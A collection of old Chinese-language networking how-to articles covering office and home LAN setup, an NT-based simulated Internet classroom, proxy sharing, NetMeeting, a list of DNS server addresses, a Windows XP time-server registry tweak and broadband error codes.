    在以太网中集线器的作用是用来将各微机引出的双绞线联接在一起，常用集线器有8口和16口两种，根据所需接入的微机数量进行选用。市场上常见的品牌有D－Link等，用户可根据具体情况选择购买。
    网络操作系统的选择：
    因国内大多用户使用的是Microsoft的Windows系列产品，为充分发挥用户现有知识的价值，选用Windows For Workgroup比较合适，有经验的用户可以选用Windows NT作网络操作系统。另外，这种网络结构也较适用于基于DOS的NetWare等操作系统所组成的Novell网。
    MODEM的选择：
    虽然各大MODEM厂商竭力将56K产品推向市场，笔者仍建议选择33.6K的MODEM，理由是国内大多ISP服务商的接入速率实在不敢恭维。
    网卡的安装：
    将网卡插入计算机插槽，使用网卡自带的安装盘进行SETUP，完成后对系统进行测试，查看中断和I/O地址，看网卡是否与其他设备冲突，如果有冲突则需重设参数。查看AUTOEXEC.BAT，确认其中已包含网络驱动，否则需要手动挂接驱动程序路径(操作系统如用Windows NT，这一步不必先做，安装NT在检测到网卡时根据提示进行设置)。
    网络操作系统的安装：
    Windows For Workgroup、Windows NT的安装分别跟Windows 3.x和Win95相似，安装时注意对共享和通讯协议的设置，通过通讯软件实现各机间E－mail的传送。NetWare的安装设置较为复杂，可参照相关资料进行。
    此种网络结构特点：
    组网、维护方便，可选多种网络操作系统，经济实用，且扩充容易，并有两种方式可供选择：(1)以双绞线连入集线器；(2)利用T型插头直接连入总线电缆。数据传输速率可满足日常办公要求。此外，这种结构也适宜整栋办公楼内部相连。

返回


中型办公室（50名左右员工）优化解决方案

《一键清理系统垃圾》

中型办公室（50名左右员工）优化解决方案

                      方案图例

配置清单

SMB-50-最佳配置清单

Model
Description
Qty
Unit/Price
Amount

Windows NT Server
2

Microsoft Proxy Server
1

Microsoft Exchange Server
1

WS-C2924-XL-A
Catalyst 2924A,24 Port 10/100Base-Tx(Standard Edition)
2
4,493
8,986

Cisco1720
Cisco VPN Router, 1 10/100BaseTx / 2 WIC slots/IP IOS
1
2,693
2,693

WIC-1B/ST
1-Port ISDN WAN Interface Card (dial and leased line)
1
750
750

HP LH3
PII 400 CPU,128M RAM,9G*3 HD,100M NIC
1

HP LC3
PII 400 CPU,64M RAM,4G HD, NIC
1

HP DAT24
24GB磁带机,2MB/S
1

HP LJ8100
A3,32PPM
1

HP LJ5000
A3,16PPM

Total Network Hardware Price USD (FOB HK):

12,429

方案说明

    方案专为员工人数为50人左右的新兴企业而设计。在解决了文件/打印服务，Internet接入服务，通讯/协作服务之后，企业需要管理至为关键的业务数据，所以这时候，新兴企业需要采用Microsoft SQL Server 7 来代替Microsoft Access等桌面数据库来建立在线事务处理的系统，提高在销售/财务/管理等一些业务工作中的效率，也为将来电子商务打下基础。Microsoft SQL Server 7中内置的OLAP服务器，可以帮助企业迅速地分析业务数据，把数据转化为智慧，提高决策支持能力。

    本方案专为员工人数为50人左右的中小企业而设计。这样的企业需要一台或多台NT服务器运行其应用软件，这些应用软件可能需要高速网络带宽。企业需要50个左右的网络接口连接PC机和NT服务器。企业连接互联网和其它广域网资源的较好方式，是采用具有2B+D(两个64kpbs B 信道和一个16kbps D信道) 带宽的ISDN专线。该专线可为用户提供高达128Kbps的带宽，或同时提供64kbps 数据线和电话服务。因此，我们以 两台Cisco Catalyst 2912XL-A快速以太网交换机为中心, 两台交换机之间通过100M交换接口相互连接。此处，我们可采用Cisco的快速以太网通道技术在两台交换机之间建立逻辑联结。我们可使用2-4个接口建立快速以太网通道连接，这样的连接可提供比单通道更多的带宽（800M/4 Peer Ports ,400M/2 Peer Ports, 全双工)。服务器使用 100M 带宽与交换机连接，PC机使用交换式的10M/100M 带宽与交换机连接。网络交换机通过一个10Base-Tx 插口与 Cisco 1720 ISDN路由器连接。Catalyst 2912XL-A网络交换机也支持运行多路广播应用所需的CGMP 协议。如果用户安装像Cisco IP/Tv 那样的多路广播软件, 他们可享受Catalyst1912A网络交换机所支持的这些功能。

网络服务器：

    对于拥有50名用户而且要求运行大量存储和计算的用户来说，用一台LC3服务器和一台性能超强部门级服务器的LH3服务器可能更为合适，其中LC3用作用户管理和打印服务器，LH3作为应用程序服务器。LH3其卓越的数据吞吐性能和强大的计算能力可将您的数据库系统和CAD制图等应用系统发挥到极至，可以支持双CPU和容纳12块Ultra 2 SCSI硬盘，使您的计算机数据库管理信息系统等可以发挥到最佳性能。

网络打印：

    对于打印机的选择我们可以利用一台专为大规模部门打印设计的HP LJ8100N打印机，它组合了最新技术和优秀性能，可真正实现大规模部门的无冲突网络打印。另外，HP LaserJet 8100系列打印机的新特性，使得选择不同介质和纸另外还可配置1台LJ5000网络打印机，分担不同需求的打印任务。

网络备份：

    HP DAT24每小7.2GB的数据存储速度和高达24GB的存储容量，而且提供高速文件访问，平均文件文件时间为40秒，并可全面兼容DDS，DDS2格式的磁带，您可以继续使用以存的文档磁带，充分保护用户的投资，为用户提供一个可靠高容量的分布式网络备份系统，充分发挥其大数据量、高速度的备份优势。

返回


主要省份城市的DNS服务器地址

《一键清理系统垃圾》

主要省份城市的DNS服务器地址

省份（城市） DNS名称 DNS IP ADDRESS
香港 ns1.netvigator.com 205.252.144.228
澳门 vassun2.macau.ctm.net 202.175.3.8
深圳 ns.shenzhen.gd.cn 202.96.134.133
202.96.154.8 /202.96.154.15
北京 ns.bta.net.cn 202.96.0.133
ns.spt.net.cn 202.96.199.133
ns.cn.net 202.97.16.195
202.106.0.20/202.106.148.1
广东 ns.guangzhou.gd.cn 202.96.128.143
dns.guangzhou.gd.cn 202.96.128.68
上海 ns.sta.net.cn 202.96.199.132
202.96.199.133 /202.96.199.133
浙江 dns.zj.cninfo.net 202.96.102.3
202.96.96.68/202.96.104.18
陕西 ns.snnic.com 202.100.13.11
天津 ns.tpt.net.cn 202.99.96.68
辽宁 ns.dcb.ln.cn 202.96.75.68
江苏 pub.jsinfo.net 202.102.29.3
四川 ns.sc.cninfo.net 61.139.2.69
河北 ns.hesjptt.net.cn 202.99.160.68
山西 ns.sxyzptt.net.cn 202.99.198.6
吉林 ns.jlccptt.net.cn 202.98.0.68
山东 202.102.152.3/202.102.128.68
福建 dns.fz.fj.cn 202.101.98.55
湖南 202.103.100.206
广西 10.138.128.40
江西 202.109.129.2
202.101.224.68/202.101.240.36
云南 ns.ynkmptt.net.cn 202.98.160.68
重庆 61.128.128.68
河南 202.102.227.68
202.102.224.68/202.102.245.12
新疆 61.128.97.73/61.128.97.74
保定 202.99.160.68 /202.99.166.4
武汉 202.103.24.68 /202.103.0.117
西安 202.100.4.15 /202.100.0.68
成都 202.98.96.68 /202.98.96.69
重庆 61.128.192.4
乌鲁木齐 61.128.97.73
青海玉树 202.100.128.68/202.100.128.102
湖北荆门 202.103.0.117/202.103.44.5


自己定义WinXP的时间校正服务器

《一键清理系统垃圾》

自己定义WinXP的时间校正服务器

    2002-01-30　　　　　作者：

WinXP新增加了很多功能，我比较喜欢的新功能之一就有网上校正时钟。但是WinXP提供的矫正时钟的服务器只有2个，其实只要我们能找到几个就能够使用几个。方法如下：进入注册表编辑器，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\Servers这个主键，选择以后可以在右边看到2个字符串值，这2个字符串值就代表着校正时间的服务器地址，我们只要新增几个字符串，并修改为你找到的能够矫正时钟的服务器地址的话，那么WinXP下可以使用的矫正时钟的服务器地址就增多了。

详细使用方法：新增字符串值，并命名为3，然后修改为你找到的服务器的网址，就OK了！！

注意事项：字符串命名规则：必须按照自然数规律来命名！


组建Internet虚拟教室

《一键清理系统垃圾》

组建Internet虚拟教室

    随着Internet技术的飞速发展,国内Internet的教育资源日益丰富,但教育经费相对紧张,不是所有的学校都能有条件让学生随意上网。尤其对于开展计算机教育不久的农村中小学来讲,这种局面日益突出。所以,充分利用现有的计算机设备,开展好现阶段的因特网教育,是我们面临的一大突出问题。而建立虚拟Internet教室，将非常有利于解决因资金不足, 而无法开展Internet教学的问题。
    建立模拟教室所需的条件
    1、硬件
    服务器：推荐Celeron 500以上;内存64MB以上； 最好双网卡(一方面能保证网络速度更快,另外可多建立虚拟的网站)。
    工作站:最好Pentium 166以上；内存16MB以上；10M网卡即可；1GB硬盘。
    2、软件
    服务器：NT4.0，Service Pack 5,Exchange Server5.0。
    工作站：Win 95以上, IE4.0以上浏览器，Office 97。

    建立WWW应用实例

    建立WWW模拟应用主要目的是让学生轻松、快速地浏览指定网站。实现方法主要是利用NT的IIS(Internet Information Server) 和DNS( Domain Name Serve)服务功能来模拟Intenret教室。
    1、通过NT的“网络”设置,添加“IIS”和“DNS服务”；选择为默认安装目录C:\ Inetpub,同时设为“共享”；将准备好的网页复制到C:\Inetpub\wwwroot\sample目录内。
    2、NT局域网还应当安装TCP/IP和NetBEUI,考虑到其他应用, 还应当安装所列出的其他协议。将NT升级至Server Pack 5,并从www.microsoft.com下载IIS的更高级版本。(NT4.0内的IIS版本号为2.0,建议下载安装)。
    3、选择其中一块网卡适配器,设置Server的IP地址为:192.168.0.1；子网掩码:255.255.255.0；默认网关:同IP地址。另在“高级”栏内根据启用的“模拟网站”的数目不同随意设置IP地址，“网关”统一设置为 192.168.0.1。(见图1)

    图1
    4、在DNS栏内填写:主机名和域名(取决于安装NT时定义的名称) ,DNS服务器搜索顺序为:192.168.0.1；WINS地址:启用DNS,启用Lmhosts；路由选择:启用IP转发。

    图2
    5、“新建服务器”,添入“DNS服务器”为192.168.0.1 ；“新建区域”:<1>区域类型:主要；<2>区域名:k12.ccm.cn,区域文件:k12.ccm.cn.dns；<3>选定k12.ccm.cn,单击右键,“新建主机”,主机名为:WWW, 主机IP为192.168.0.1(如图2)。这样,我们已经拥有了一个模拟网站了。注:每一个模拟网站,对应一个前面设置好的IP。
    6、打开Internet服务管理器。属性设置:添加“目录”为c:\Inetpub\wwwroot\sample\k12(下载网站在盘上的存储路径)如图3所示;目录属性各项值为:主目录;虚拟服务器IP为:192.168.0.1;访问:读取,执行。

    图3
    7、在“启用默认文档”,设“默认文档”为:index.htm。若发现你所下载的网站的索引文件与此不同,如home.htm,可在MS－DOS方式下, 将文件名改为index.htm即可。并将“允许目录游览”选项选中。
    8、学生机的有关设置:IE的初始连接建议设为“局域网”方式。设置默认主页为:www.k12.com.cn,假设教室共有30台机器,从1号机开始,分别分配IP固定值为:192.168.0.1.10～192.168.0.39(或由DHCP服务器动态分配,设置范围如上)。子网掩码为255.255.255.0,DNS设置为:192.168.0.1,并打开NetBIOS功能。
    经过如上设置,我们的WWW服务就做好了,在学生机上,键入www.k12.com.cn, 试试,感觉是不是很棒呢?又有谁会认为这是“假”的呢?

    建立电子邮件收发中心

    利用NT的Exchange Server5.0 可以实现局域网内的用户每人拥有一个E－mail账号,通过Outlook随意收发E－mail。
    1、安装电子邮件服务器：检查 Exchange Server 进程被启动和运行 , 确保Exchange已经正常工作,然后为管理组设置权限。
    2、在邮件服务器上创建工作站用户信箱。
    3、从工作站登录电子邮件服务器,对网络工作站进行相关设置。
    4、对工作站配置邮件文件的信息服务,添加与服务器的连接。

    高级应用及几点想法

    1、自建学校教学网站,发布因特网的学习知识, 教师多媒体辅助教学软件,或从网上(www.edu.cn或www.cernet.edu.cn)下载教学的有关信息,建立一个论坛BBS,用来探讨有关问题,或是建立教师素材库等等。
    2、学生上网比较多的学校也可建立一个主页,发布到Internet上,利用有关工具建立一个如“安博教育在线”或“语文在线”式的平台,针对学生进行课外辅导或讲授有关课程,与学校局域网的内容保持同步。
    3、网页内容可以根据需要,随时从网上Download,并随时更新。
    4、学生可自建个人主页,分配空间,发布到局域网上。
    5、另外,若你的网络足够好,可加入视频点播,网络电影,网络贺卡等等功能, 这才是真正的Internet。
    6、有条件的学校,可建立多媒体电子网络教室,如采用“黑马”,“南京远志”,“海信世纪学堂”等产品。充分利用其“广播”,“电子教鞭”等功能,可以更好地实现Internet教学。

返回


组建家庭网吧

《一键清理系统垃圾》

组建家庭网吧

    技术的发展实在太快了，看着性能不断提高、而价格不断降低的电脑市场，不少朋友也许与我一样在不断感叹买的电脑“又落后了！”同时，总是压抑不住升级的冲动。作为我等“发烧”热度不太高的工薪阶层，经常升级毕竟是无法做到的。但两三年升一次级，似乎还是很有必要。我自己五年之内已经换了三台电脑了。可换下来的旧电脑怎么处理呢？有了PII后，可原来的奔腾MMX还好好的呢?除了慢了点儿(其实比起486、386来快多了)。卖到中关村的二手电脑市场，真是卖不了仨瓜俩枣钱，太亏了。我觉得，最好的办法是联个家庭网吧，新旧电脑一块儿用，资源共享，各得其所，更好地发挥各自的作用。

    家庭网吧硬件要求

    家庭网吧实际上是一个小小的局域网，我觉得采用双绞线联网是最方便合理的。每台联网的机器需配一块网卡，PCI总线或ISA总线均可，10M的网卡便宜的只需40～50元一块，质量一般没问题。最好所有机器配同一型号的网卡，这样可以简化安装过程(因为所有的网卡的安装过程相同简化操作且免去兼容困扰)，一旦网卡出现问题也可以采用替代法迅速找到问题所在。如果联网的机器多于两台，必须配置Hub(集线器)，而如果只是两台机器联网，不必用Hub，只用一条双绞线即可。但这条线要做成交叉连接，即一端的1、2线对要与另一端的3、6线对交叉连接。这可以在买网卡和网线时请商家帮忙做好，你只要和商家一说是两台机联网用，商家就知道如何做了。
    家庭网络可以做成固定连接的，也可以平时不连接，仅在需要传输数据或共享资源时才临时连接。如果是临时连接，要经常拔插网络插头，而从计算机背面拔插插头实在是不方便。我采取的办法是：将联网线分成两段，两段都是普通的、非交叉连接的双绞线，在两段线中间接一个双绞线对接插座，但要在对接插座上进行一点改造：将对接插座拆开，把其中的1、2线对和3、6线对割断后重新交叉连接，就做成了一个最小的“Hub”。当然，也可以将两段双绞线之一做成交叉线，而不用去改造对接插座。有了对接插座后，临时连接就非常方便了，可以随时连接或断开。

    网络安装与配置

    家庭联网比较容易实现又比较实用的是采用Win98的对等网。将网卡装到计算机中后，要进行网络配置。需要配置的内容主要有三项：
    1、 网卡驱动程序 如果网卡是即插即用的，装上网卡后再次上电，Win 98操作系统会引导用户安装网卡驱动程序。用户也可以自己安装。安装过程是：从控制面板/网络/配置中选择“添加”，然后选择“适配器”，再从列表中选择要安装的网卡，或选择“从磁盘安装”按钮。
    2、 网络协议 安装网卡驱动程序后，若在对话框中“已经安装了下列网络组件”的列表中没有包括“TCP/IP”一项，还要通过选择“添加”，“协议”，“Microsoft”，“TCP/IP”逐级弹出对话框添加TCP/IP协议。TCP/IP协议是Internet的基础，若希望网上的机器能够通过一台Modem和一条电话线共享Internet访问功能，TCP/IP协议是必不可少的。用户还可以根据需要安装其它网络协议(另外，IPX／SPX兼容协议及NetBEVI协议也十分有必要安装)。
    3、 文件和打印共享服务 为了实现文件、打印机等资源在网上共享，必须安装文件与打印共享服务。安装通过“添加”、“服务”等对话框进行，在“服务”对话框中选择添加“Microsoft网络上的文件与打印机共享”，并根据需要在“文件及打印共享”设置中，决定是否允许网上的其它计算机访问本机的文件，以及使用连在本机上的打印机。
    为了保证网络通信能够进行，还要进行网络配置，需要配置的项目主要有：
    1、 网卡 在“网络/配置”对话框中选中网卡(网络适配器)项，然后点“属性”按钮，弹出“属性”对话框，选择“绑定”，然后选定所需的网络协议。点“确定”按钮确认配置。
    2、 TCP/IP协议 在“网络/配置”对话框中选中TCP/IP项，然后点“属性”按钮，弹出“属性”对话框，选中IP地址，一般应用可选择“自动获取IP地址”，如有特殊要求，也可选择“指定IP地址”，并根据需要设置IP地址和子网掩码，必须保证所有网上的机器各自有惟一的IP地址，并使得所有机器的IP地址在同一个网络上，并设定相应的子网掩码。具体配置方法可参阅相应参考书。
    3、 计算机标识 在“网络/标识”对话框中，填入“计算机名”，“工作组”，“计算机说明”，最重要的是“计算机名”，这是网上计算机互相识别的标识。
    注意：在网络配置的过程中，为了使得配置真正起作用，操作系统往往要提示重新启动计算机。

    网上资源共享

    联网的最大好处是网上资源的共享，主要是文件的共享和打印机共享。文件共享使得网上的计算机可以方便地互传数据，还可以利用其它计算机上的硬盘作本机的备份， 提高数据的安全性；打印共享一方面避免了不同计算机打印时将打印机搬来搬去、打印电缆拔下插上的麻烦，而且可以将不同类型的打印机接到网上不同的机器上，完成不同的打印工作。例如可用针式打印机打印计算机程序或不重要的文本，以降低打印成本；而用激光打印机打印正式的文本，以取得好的打印效果；用喷墨打印机打印图像等等。
    1、文件共享
    首先要将希望在网上共享的磁盘或目录设置成共享属性。打开“我的电脑”，在希望共享的磁盘图标上右击鼠标，弹出菜单后选择“共享”项，弹出“属性/共享”对话框(也可在菜单中选择“属性”，弹出对话框后再选“共享”)，选中“共享为”，根据需要填入“共享名”(这是其它机器识别该共享磁盘的名字)，“备注”，再根据需要，选择访问类型为“只读”、“完全”，或“根据密码访问”，如果填入了密码，其它机器访问该磁盘时，必须给出正确的密码。目录的共享属性设置与磁盘共享的设置过程类似。当磁盘或目录(文件夹)设置成共享属性后，在相应的图标下面会出现一只手，表示该磁盘或目录的共享属性。设置了共享属性后，在其它机器上访问共享磁盘或目录时，就像访问本地磁盘或目录一样方便。
    网上的其它机器访问共享磁盘或目录时，打开“网上邻居”，逐层进入所要访问的磁盘或目录。如果经常访问网上某一共享磁盘或目录，为了方便，可将共享磁盘或目录映射成网络磁盘：通过“网上邻居”逐级打开的磁盘或目录图标，右击鼠标，在弹出的菜单上选择“映射网络驱动器”，在弹出的对话框中设定盘符，以后就可以用此盘符访问共享的磁盘或目录了。
    大概是由于Win 98的网络功能不够健全，有时明明网络是通的，但在“网上邻居”中就是看不到网上的其它机器，这时可通过在“开始”菜单中选择“查找”子菜单，再选择“计算机”(可在“计算机名”中输入“＊.＊”进行查找)，找到后，可直接在找到的计算机名上双击，则可弹出相应窗口，进行以上所述操作。
    2、打印机共享
    首先在连接共享打印机的计算机上打开“我的电脑”，打开“打印机”文件夹，在欲共享的打印机的图标上右击，选择“共享”，弹出“属性/共享”对话框，将打印机设置成网络共享打印机，其过程与设置共享磁盘或目录类似。然后在需要使用网络共享打印机的计算机上安装网络打印机，其过程与安装本地打印机类似，只是在“打印机安装向导”中选择“网络打印机”。安装了网络打印机后，在应用程序(如Word)中执行打印功能时，就可以选择网络打印机进行打印了。

    家庭网吧上共享Internet

    目前，很多家庭都已成为Internet的拨号上网用户，在家中联成局域网后，如果能在网上共享Internet，无疑会带来很多兴趣。局域网通过一台Modem和一条电话线上网，一般是在安装Modem的机器上安装一个代理服务器软件，网络上的其它机器通过代理服务器访问Internet。这类的软件很多，如著名的WinGate、SyGate等，但这些软件往往要进行注册，用起来有点麻烦。本人最近试用了另外两种代理服务器软件，尽管不那么有名，但感觉不错。
    1、 小巧玲珑的AnalogX Proxy
    这是一个安装前只有200多K的小软件，虽然很小，功能不是很全和很强，但具备了代理服务器所需的最基本的功能，可以满足一些简单应用的需要。
    AnalogX Proxy的安装过程很简单，直接运行文件名为Proxyi的自解压安装程序即可。安装完成后，生成一个名为Proxy.exe的代理服务器程序，运行这一程序，就使这台机器成为访问Internet的代理服务器。
    安装了代理服务器软件后，还要对局域网上的其它机器进行配置，才能通过代理服务器访问Internet。主要需要配置的是浏览器和电子邮件。如果使用的浏览器是IE，可以通过在“控制面板”中的Internet选项弹出“Internet属性”对话框，选择“连接”，点“局域网设置”按钮，弹出“局域网设置”对话框，选中“使用代理服务器”，再点中“高级”，在弹出的“代理服务器”对话框中填入所需的内容。其中“代理服务器地址”一项填入安装代理服务器软件的机器的IP地址或计算机名。可通过“控制面板”中“网络”选项弹出“网络/配置”对话框，再从中选择“TCP/IP”，点击“属性”弹出“TCP/IP属性”对话框，选择“IP地址”，查看IP地址或配置IP地址；而计算机名可通过在“IP地址”中选择的是“自动获取IP地址”，则可在“网络”对话框中选择“标识”，查看或设置(若代理服务器机器上“IP地址”选项为“自动获取IP地址”，则应填入计算机名，因为在这种情况下，每次分配的IP地址可能不一样)。在“端口”项中，“http”和“https”栏中填入“6588”，在“FTP”栏中填入“21”。配置也可以在IE的菜单栏中选择“工具”菜单中的“Internet选项”进行。Netscape Communicator的配置方法为：在Communicator(或Navigator)的菜单栏中逐级选择“Edit”、 “Preferences”、“Category”、 “Advanced” “Proxies”、 “Manual”、 “View”，弹出对话框，其余的过程与配置IE类似。
    E－mail的配置内容主要是将电子邮件服务器的地址(收信服务器POP3和发信服务器SMTP)均设为安装代理服务器软件的机器的IP地址(或计算机名)。有关浏览器和电子邮件的配置的更详细的说明可以参看名为“Proxy.txt”的文件。
    2、 功能较齐全的Net Proxy
    这是一个功能较为齐全的代理服务器软件。其安装过程也很简单，直接运行自解压安装程序“Np304.exe”即可。安装完成后，要分别进行服务器端和客户端(浏览器和电子邮件)的配置。Net Proxy的功能比“AnalogX Proxy的功能要强很多，因此可配置的项目也多一些，例如可设定代理服务器软件根据客户端的需求(客户端的浏览器访问Internet与否)自动拨号或挂断Modem、根据需要改变各种服务的端口号等。但一般采用默认的配置即可很好地工作。需要特别提及的一点是：在“POP3 Gageway”一项的配置中(双击“POP3 Gageway”)，有一项“Devider character”(“分隔符”)，默认值为“＃”，若在客户端收电子邮件时不能正常工作，可将其值改为“@”试试。由于Net Proxy的功能较强，详细的资料请参考该软件的帮助文件。
    AnalogX Proxy 和Net Proxy都可以从“新浪网”站点下的“软件下载中心”下载，网址为：http://download.sina.com.cn/。

返回


组建网上会议

《一键清理系统垃圾》

返回总目录 上一页 目录页

组建网上会议

Microsoft NetMeeting提供了一种组建网上会议的方式。在局域网上，服务器安装Windows NT 4.0，客户端安装Windows 98或Windows 95，同时服务器与客户端一定要安装TCP/IP协议。

使用Microsoft NetMeeting时，客户端计算机至少带8MB内存，采用486/66处理器；服务器必须安装Microsoft Windows NT 4.0 Service Pack 3，至少是带16MB内存，采用486/66处理器。

配置与麦克风和扬声器连接的声卡。声卡可以是全双工的，也可以是半双工的，最好使用全双工的，以便于在收到声音信号的同时也能讲话。

如果想看见您呼叫的用户，那就需要视频捕获卡和摄像机，或支持Windows视频的摄像机。但在CPU速度过低的某些计算机上就无法发送视频图像。

一、安装及配置

在客户端安装Microsoft NetMeeting程序的方法如下：

从开始、设置、控制面板、添加/删除程序、Windows安装程序到通讯组件，在“通讯组”件中，点击“详细资料”，选中Microsoft NetMeeting组件，按“确定”即可安装。

在运行Microsoft NetMeeting之前，局域网中的所有上网的计算机一定地要事先配置好TCP/IP协议，以便通过TCP/IP协议进行呼叫。

第一次启动Microsoft NetMeeting时，根据提示填上有关信息后，进入Microsoft NetMeeting程序，在“呼叫”选单栏中选中，更改“我的信息”，进入“选项”设置如下：

在“常规”选项中配置“网络带宽”为“局域网”，若是通过Internet组建网上会议则选择ISDN或调制解调器。

同时不要忘记在“协议”选中TCP/IP协议，此协议用于局域网，若是通过Modem组建网上会议则选取调制解调器选项。

  二、常见问题及注意事项

1.在启动NetMeeting之前，局域网中的计算机“网上邻居”里能看到上网的其他计算机。

2.NetMeeting无法在Windows 3.1或Windows 98 Beta 3之前的Beta版本上运行。

3.建议在安装NetMeeting 2.1版本之前，卸载以前的Microsoft NetMeeting Beta版本。

4.NetMeeting不支持通过IPX或PSTN发出呼叫。

5.可成功参加会议的总人数将根据可用的网络带宽和与会者的计算机速度而变化。

6.计算机之间发送大量数据时(例如，在传输大文件时交谈并同时共享着几个应用程序)，可能会使会议中的计算机变得极为缓慢，为解决这一问题，请停止会议中的一项或几项活动。

7.如果是通过288kbps连接使用NetMeeting，通过单击“工具”选单上的“选项”命令，然后选择“网络带宽”部分的“ISDN”或“局域网”，可以提高音频和视频的质量。

返回


局域网故障

《一键清理系统垃圾》

返回总目录

局域网故障

◎4.2.5 常用邮件、图片、影像、ZIP、MS Office、声音文件的修复
◎ADSL常见经典故障大全！
◎BNC网络维修思路
◎BT服务器架设全攻略
◎CAD教学网组建实例
◎服务器端的设置：
◎DHCP 服务器的安装和配置
◎DNS 服务器的配置与管理
◎IPC$命令详解
◎IPX如何向IP迁移
◎IP地址常识
◎IP地址盗用常用方法及防范
◎IP地址盗用技术简介以及防范措施综述
◎IP端口对照表(中文注释)
◎IP寻址技术
◎MMU 1对7系统标准
◎MMU 系统FAQ
◎NETWARE服务器随机存储器的扩展
◎net命令详解
◎Novell和Windows NT混合网的组建
◎Novell和Windows NT混合网的组建
◎NOVELL网上的电子邮件系统First Mail
◎Novell无盘网络常见问题与对策
◎OSI七层网络模型与TCP/IP四层网络模型
◎P2P中保障Windows网络安全的五大步骤
◎PING命令的高级用法
◎SOHO局域网首选无线
◎TCPIP完整的一套基础介绍（二）
◎TCPIP完整的一套基础介绍（六）
◎TCPIP完整的一套基础介绍（七）
◎TCPIP完整的一套基础介绍（三）
◎TCPIP完整的一套基础介绍（四）
◎TCPIP完整的一套基础介绍（五）
◎TCPIP完整的一套基础介绍（一）
◎WINDOWS2000作企业内部网服务器详解
◎Windows 2000服务器家族--卓越的电子商务平台
◎Windows NT服务器及工作站的安装
◎Windows NT服务器用作路由器
◎Windows NT网络服务器的ASP危机
◎Windows网络实用工具大集合
◎WINS 服务器的安装与设置
◎WWW访问控制及客户帐号管理
◎安全正确的配置Win2000+IIS5.0服务器
◎安装NT Server服务器
◎安装双文件服务器
◎办公网规划两步曲
◎财务电算局域网组建实例
◎代理服务器的路由问题
◎电子商务解决方案
◎一、IP地址与IP地址的动态分配
◎多媒体网络教学解决方案
◎多人共享计算机系统集成解决方案
◎分析并解决局域网内盗用IP的安全问题
◎服务器安全指南
◎服务器常见故障的诊断与解决
◎给Novell文件服务器加装一个硬盘
◎构 造 多 媒 体 教 室
◎构建DNS服务器简易指南
◎构建Win2000服务器的安全防护林
◎构建经济实用的校园网
◎构建企业级电子邮件系统
◎关于MMU产品的系统/网络管理基本设置
◎管理Internet 信息服务器
◎会议电视系统方案
◎计算机局域网的保密
◎家庭/中小企业廉价实用的联网方案
◎家庭/中小企业廉价实用的联网方案
◎建个经济实用的上网教室
◎建立因特网上的邮件服务器
◎IP地址冲突问题的解决方法
◎禁止ipc$默认共享的方法
◎经济实用建设校园网
◎经济型多媒体教育网的组建
◎经济型网吧的组建
◎局域网2000、XP、98互访解决简介
◎局域网加速一些问题以及心得体会
◎局域网经典故障解决
◎局域网速度变慢的故障分析
◎局域网网络故障排除策略(上)
◎局域网网络故障排除策略(下)
◎局域网文件拷备速度奇慢问题解决三例
◎无法访问的解决方法集锦
◎昆明实验小学 千兆校园网设计方案
◎利用ISDN构造广域网
◎利用Windows for Workgroups3.11和Windows95组建办公网
◎利用WINRAR自解压包进行网吧日常更新详解
◎利用代理服务器建立网上教室
◎利用卫星接入Internet的技术方案
◎了解网络常见错误信息
◎面向因特网的校园网
◎能上QQ但不能上网问题精解
◎配置DHCP可防IP地址冲突
◎普通电话线组建企业Internet／Intranet
◎奇特网络故障排除
◎企业局域网的保密工作
◎企业网站数据装入及发布
◎千兆校园网全面解决方案
◎浅析系统网络管理经验之五大问题
◎全面解决家庭局域网故障
◎让局域网快速连接Internet
◎如何高效维护局域网
◎如何建立自己的Web站点
◎如何排除上网过程中所遇到的种种故障
◎设置“显别人的IP”
◎如何设置一个高容量的Linux POP3服务器
◎如何实现网络分段
◎三种宽带上网拨号软件的常见故障与解决方法
◎上海市石化工业学校千兆校园网全面解决方案
◎设计一个廉价实用校园网
◎宿舍网组建全攻略
◎同时共享一台电脑的资源！如同单独使用一台多媒体电脑
◎网 络 安 全 解 决 方 案
◎网吧 大宗邮件快速收发
◎网吧IP自动修改程序
◎网吧XP系统制作及优化
◎网吧常见问题的诊断与解决
◎网吧方案介绍
◎网吧安全之---网吧管理十大漏洞嚗光
◎网吧管理有妙招
◎
◎网吧频繁掉线
◎网吧频繁掉线解析与解决方法
◎网吧系统攻防
◎
◎
◎网络不通的解决之道
◎网络工程师必懂的专业术语
◎网络故障诊断和优化
◎网络故障诊断及网络设置优化
◎网络故障诊断及网络设置优化
◎网络管理员常见错误集锦
◎
◎网络规划中的IP地址分配
◎网络经典命令
◎网络连接和测试
◎网络命令程序使用全攻略
◎网络维护专题
◎网络最经典命令行安全工作者的必杀技
◎网上邻居”故障的轻松排除
◎网站浏览安全细细谈
◎35个经典小游戏（下载）
◎为NetWare服务器添加内存和硬盘
◎为服务器添加多块网卡
◎无线局域网的实际应用
◎系统管理护卫网络运营
◎详解测试IP地址的几个命令
◎小企业INTERNET接入方案
◎小企业用小Email系统
◎小型企业局域网构建指南
◎校 园 网 解 决 方 案
◎校园网VLAN的设计和管理
◎校园网管理问与答
◎校园网解决方案
◎星型局域网组网指南
◎选择适合的多媒体教学网
◎一个ATM城域网的设计与应用实例
◎一个办公环境的备份方案
◎一个不够，再来一个——用双服务器改造网络
◎医院系统解决方案
◎银行系统解决方案
◎用Linux建立局域网服务器
◎用卷拷贝的方法移植Novell网服务器
◎用千兆以太网构造城域网
◎用网桥为Novell网提速
◎用知识扼杀网络风暴
◎游戏网吧的组建
◎
◎远程、移动用户连接网络十大法则
◎多媒体网络教室方案
◎在Win NT平台上访问NetWare服务器
◎在网络服务器上安装Developer/2000
◎证券交易所组网方案实例
◎证券系统有备无患
◎证券总部管理系统
◎中等学校千兆校园网解决方案
◎中小型办公局域网的实现
◎中型办公室（50名左右员工）优化解决方案
◎主要省份城市的DNS服务器地址
◎自动GHOST的参数！想自动网络GHOST的来看！
◎自己定义WinXP的时间校正服务器
◎组建Internet虚拟教室
◎组建家庭网吧
◎组建网上会议

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


宽带连接故障代码

《一键清理系统垃圾》

返回总目录 目录页 下一页

宽带连接故障代码

宽带连接故障代码含意

    一、Windows XP自带拨号软件出错信息

    1.Error 691

    输入的用户名和密码不对，无法建立连接。 原因：用户名和密码错误；ISP服务器故障。
    解决方法：使用正确的用户名和密码，并且使用正确的网络服务提供商提供的账号格式。

    2.Error 797

    ADSL Modem连接设备没有找到。
